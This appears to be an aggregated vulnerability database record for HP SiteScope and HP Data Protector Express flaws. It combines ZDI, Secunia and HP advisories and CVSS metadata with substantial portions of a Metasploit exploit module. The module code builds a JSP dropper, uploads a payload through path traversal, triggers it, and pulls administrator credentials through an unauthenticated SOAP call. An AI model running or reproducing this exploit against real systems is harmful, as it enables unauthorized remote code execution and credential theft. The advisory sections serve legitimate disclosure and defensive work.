jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
jspraw << "#{var_comb} <<= 4;\n"
jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
jspraw << "}\n"
jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
jspraw << "#{var_outputstream}.close();\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
jspraw << "String[] #{var_fperm} = new String[3];\n"
jspraw << "#{var_fperm}[0] = \"chmod\";\n"
jspraw << "#{var_fperm}[1] = \"+x\";\n"
jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
# Linux and other UNICES allow removing files while they are in use...
jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
jspraw << "} else {\n"
# Windows does not ..
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
jspraw << "%>\n"
# Specify the payload in hex as an extra file..
payload_hex = payload.encoded_exe.unpack('H*')[0]
post_data = Rex::MIME::Message.new
post_data.add_part(payload_hex, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
print_status("#{@peer} - Uploading the payload")
res = send_request_cgi(
{
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=..\\..\\..\\..\\..\\..\\#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'headers' =>
{
'Cookie' => "JSESSIONID=#{session_id}",
}
})
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1
print_good("#{@peer} - Payload successfully uploaded to #{path}")
else
print_error("#{@peer} - Error uploading the Payload")
return
end
post_data = Rex::MIME::Message.new
post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
print_status("#{@peer} - Uploading the JSP")
res = send_request_cgi(
{
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=..\\..\\..\\..\\..\\..\\#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'headers' =>
{
'Cookie' => "JSESSIONID=#{session_id}",
}
})
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1
print_good("#{@peer} - JSP successfully uploaded to #{path}")
else
print_error("#{@peer} - Error uploading the JSP")
return
end
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
send_request_cgi(
{
'uri' => "#{@uri}#{@jsp_name}.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session_id}",
}
})
end
def access_configuration
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n"
data << "xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
data << "xmlns:xsd='http://www.w3.org/2001/XMLSchema'" + "\r\n"
data << "xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'" + "\r\n"
data << ">" + "\r\n"
data << "<wsns0:Body" + "\r\n"
data << "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'" + "\r\n"
data << ">" + "\r\n"
data << "<impl:getSiteScopeConfiguration" + "\r\n"
data << "xmlns:impl='http://Api.freshtech.COM'" + "\r\n"
data << "></impl:getSiteScopeConfiguration>" + "\r\n"
data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>"
res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl",
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,
'headers' => {
'SOAPAction' => '""',
}})
if res and res.code == 200
if res.headers['Content-Type'] =~ /boundary="(.*)"/
boundary = $1
end
if not boundary or boundary.empty?
return nil
end
if res.body =~ /getSiteScopeConfigurationReturn href="cid:([A-F0-9]*)"/
cid = $1
end
if not cid or cid.empty?
return nil
end
if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m
loot = Rex::Text.ungzip($1)
end
if not loot or loot.empty?
return nil
end
return loot
end
return nil
end
end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ZDI-12-173 : (0Day) HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-173 August 29, 2012
-
-- CVE ID:
-
-- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C
-
-- Affected Vendors: Hewlett-Packard
-
-- Affected Products: Hewlett-Packard SiteScope
-
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12484. Authentication is not required to exploit this vulnerability.
-
-- Vendor Response:
-
-- Mitigation: Given the stated purpose of SiteScope, and the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the HP SiteScope service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in http://technet.microsoft.com/en-us/library/cc725770%28WS.10%29.aspx and numerous other Microsoft Knowledge Base articles.
-
-- Disclosure Timeline: 2011-12-22 - Vulnerability reported to vendor 2012-08-29 - 0Day advisory released in accordance with the ZDI 180 day deadline policy
-
-- Credit: This vulnerability was discovered by:
-
Andrea Micalizzi aka rgod
-
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201009-0282",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "data protector express",
"scope": "eq",
"trust": 1.6,
"vendor": "hp",
"version": "3.5"
},
{
"model": "data protector express",
"scope": "eq",
"trust": 1.6,
"vendor": "hp",
"version": "3.1"
},
{
"model": "data protector express",
"scope": "eq",
"trust": 1.6,
"vendor": "hp",
"version": "4.0"
},
{
"model": "data protector express sse",
"scope": "eq",
"trust": 0.9,
"vendor": "hp",
"version": "3.x"
},
{
"model": "data protector express sse",
"scope": "eq",
"trust": 0.9,
"vendor": "hp",
"version": "4.x"
},
{
"model": "data protector express",
"scope": "eq",
"trust": 0.9,
"vendor": "hp",
"version": "4.x"
},
{
"model": "data protector express",
"scope": "eq",
"trust": 0.9,
"vendor": "hp",
"version": "3.x"
},
{
"model": "data protector express",
"scope": "lt",
"trust": 0.8,
"vendor": "hewlett packard",
"version": "build 56936"
},
{
"model": "openview data protector",
"scope": null,
"trust": 0.7,
"vendor": "hewlett packard",
"version": null
},
{
"model": "sitescope",
"scope": null,
"trust": 0.7,
"vendor": "hewlett packard",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"db": "BID",
"id": "43105"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:sp1:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:*:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp2:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp1:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.1:*:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-3007"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AbdulAziz Hariri of Insight Technologies",
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "BID",
"id": "43105"
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
],
"trust": 1.6
},
"cve": "CVE-2010-3007",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2010-3007",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2010-3007",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-173",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-3007",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2010-3007",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-173",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201009-078",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Data Protector. Authentication is not required to exploit this vulnerability.The specific flaw exists within the function DtbClsLogin defined in the module dpwindtb.dll on Windows and libdplindtb.so on Linux. This function takes user supplied input and copies it directly to a stack buffer. By providing a large enough string this buffer can be overrun and may result in arbitrary code execution dependent on the underlying operating system. One of those calls is getSiteScopeConfiguration() which will return the current configuration of the server including the administrator login and password information. ----------------------------------------------------------------------\n\n\nWindows Applications Insecure Library Loading\n\nThe Official, Verified Secunia List:\nhttp://secunia.com/advisories/windows_insecure_library_loading/\n\nThe list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected. \n\n\n----------------------------------------------------------------------\n\nTITLE:\nHP Data Protector Express Denial of Service and Privilege Escalation\n\nSECUNIA ADVISORY ID:\nSA41361\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/41361/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=41361\n\nRELEASE DATE:\n2010-09-10\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/41361/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/41361/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=41361\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in HP Data Protector Express, which\ncan be exploited by malicious, local users to cause a DoS (Denial of\nService) or potentially gain escalated privileges. \n\nThe vulnerability is caused due to an unspecified error. No further\ninformation is currently available. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits AbdulAziz Hariri of Insight Technologies via ZDI. \n\nORIGINAL ADVISORY:\nHPSBMA02576 SSRT090231:\nhttp://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nReferences: CVE-2010-3007, ZDI-CAN 581\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nNote: The supported versions of Microsoft Windows, Linux, and Novell NetWare are listed below. \n\nNote: Users can identify the build number by clicking on \u0027Help\u0027 and then \u0027About\u0027. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-3007 (AV:L/AC:L/Au:S/C:P/I:C/A:C) 6.4\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nThe Hewlett-Packard Company thanks AbdulAziz Hariri of Insight Technologies along with TippingPoint.s Zero Day Initiative for reporting this vulnerability to security-alert@hp.com\nHP Data Protector Express \u0027Hot Fix\u0027 (Build 56936) for version 3.5 SP2 is supported on the following:\n\nWindows Operating Systems\n Version\n\n Microsoft Windows Unified Data Storage Server (incl. R2)\n\n Microsoft Windows Server 2003 Enterprise / Standard Editions (incl. R2)\n\n Microsoft Windows Storage Server 2003 (incl. R2)\n\n Microsoft Windows 2000 Server / Advanced Server SP4\n\n Microsoft Windows Small Business Server 2000 SP4\n\n Microsoft Windows 2000 Professional SP4\n\n Microsoft Windows Small Business 2003 Server Premium / Standard (incl. R2)\n\n Microsoft Windows XP Professional / Home SP2\n\nLinux Operating Systems\n Version\n\n Red Hat Enterprise Linux (WS/ES/AS) 5\n\n Red Hat Enterprise Linux (WS/ES/AS) 4\n\n Red Hat Enterprise Linux (WS/ES/AS) 3\n\n SuSE Linux Enterprise Server 10\n\n SuSE Linux Enterprise Server 9\n\nNovell Operating Systems\n Version\n\n NetWare 6.5 SP2\n\n NetWare 6.0 SP3\n\nHP Data Protector Express \u0027Hot Fix\u0027 (Build 56906) for version 4.0 SP1 is supported on the following:\nWindows Operating Systems\n Version\n\n Windows Server 2008 SP1 (32-bit and X64) Enterprise / Standard / Datacenter / Web Server Editions\n\n Windows Server 2003 R2 SP2 (32-bit and X64) Enterprise / Standard Editions\n\n Windows Small Business Server 2008 (32-bit and X64)\n\n Windows Small Business Server 2003 R2 (32-bit and X64)\n\n Windows Unified Data Storage Server 2003 R2 (32-bit and X64)\n\n Windows Storage Server 2003 R2 (32-bit and X64)\n\n Windows VISTA SP1 (32-bit and X64)\n\n Windows XP SP3 (32-bit)\n\nLinux Operating Systems\n Version\n\n Red Hat Enterprise Linux (WS/ES/AS) 5.0 update 1 (32-bit and X64)\n\n Red Hat Enterprise Linux (WS/ES/AS) 4.0 update 6 (32-bit and X64)\n\n SuSE Linux Enterprise Server 10 update 2 (32-bit and X64)\n\n SuSE Linux Enterprise Server 9 update 4 (32-bit and X64)\n\nNovell Operating Systems\n Version\n\n NetWare 6.5 SP5\n\nRESOLUTION\n\nHP has provided upgrades to resolve this vulnerability. \n\nPRODUCT SPECIFIC INFORMATION\nNone\n\nHISTORY\nVersion:1 (rev.1) 8 September 2010 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n To: security-alert@hp.com\n Subject: get key\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n -check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n -verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin\nrelates to is represented by the 5th and 6th characters\nof the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\nCopyright 2009 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAkyIYLcACgkQ4B86/C0qfVnz1QCgveZICKBeXxRlmAbL4cZvzgaq\nmbIAoPqa1Ba0NueuwFSHxxrzX95YSyf3\n=sbSc\n-----END PGP SIGNATURE-----\n. \n\n-- Vendor Response:\nHewlett-Packard has issued an update to correct this vulnerability. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. ##\n# This file is part of the Metasploit Framework and may be subject to\n# redistribution and commercial restrictions. Please see the Metasploit\n# web site for more information on licensing and terms of use. \n# http://metasploit.com/\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\tRank = ExcellentRanking\n\n\tHttpFingerprint = { :pattern =\u003e [ /Apache-Coyote/ ] }\n\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Exploit::EXE\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t\u0027Name\u0027 =\u003e \u0027HP SiteScope Remote Code Execution\u0027,\n\t\t\t\u0027Description\u0027 =\u003e %q{\n\t\t\t\t\tThis module exploits a code execution flaw in HP SiteScope. It exploits two\n\t\t\t\tvulnerabilities in order to get its objective. An authentication bypass in the\n\t\t\t\tgetSiteScopeConfiguration operation, available through the APISiteScopeImpl AXIS\n\t\t\t\tservice, to retrieve the administrator credentials and subsequently abuses the\n\t\t\t\tUploadManagerServlet to upload an arbitrary payload embedded in a JSP. The module\n\t\t\t\thas been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2. \n\t\t\t},\n\t\t\t\u0027Author\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t\u0027rgod \u003crgod[at]autistici.org\u003e\u0027, # Vulnerability discovery\n\t\t\t\t\t\u0027juan vazquez\u0027 # Metasploit module\n\t\t\t\t],\n\t\t\t\u0027License\u0027 =\u003e MSF_LICENSE,\n\t\t\t\u0027References\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u002785120\u0027 ],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u002785121\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u002755269\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u002755273\u0027 ],\n\t\t\t\t\t[ \u0027URL\u0027, \u0027http://www.zerodayinitiative.com/advisories/ZDI-12-173/\u0027 ],\n\t\t\t\t\t[ \u0027URL\u0027, \u0027http://www.zerodayinitiative.com/advisories/ZDI-10-174/\u0027 ]\n\t\t\t\t],\n\t\t\t\u0027Privileged\u0027 =\u003e true,\n\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\u0027Targets\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027HP SiteScope 11.20 / Windows x86\u0027,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Arch\u0027 =\u003e ARCH_X86,\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027\n\t\t\t\t\t\t},\n\t\t\t\t\t]\n\t\t\t\t],\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0,\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Aug 29 2012\u0027))\n\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOpt::RPORT(8080),\n\t\t\t\tOptString.new(\u0027TARGETURI\u0027, [true, \u0027Path to SiteScope\u0027, \u0027/SiteScope/\u0027])\n\t\t\t], self.class)\n\tend\n\n\tdef on_new_session(client)\n\t\tif client.type == \"meterpreter\"\n\t\t\tclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n\t\t\tclient.fs.file.rm(\"../#{@var_hexfile}.txt\")\n\t\t\tclient.fs.file.rm(\"../#{@jsp_name}.jsp\")\n\t\telse\n\t\t\tclient.shell_command_token(\"del 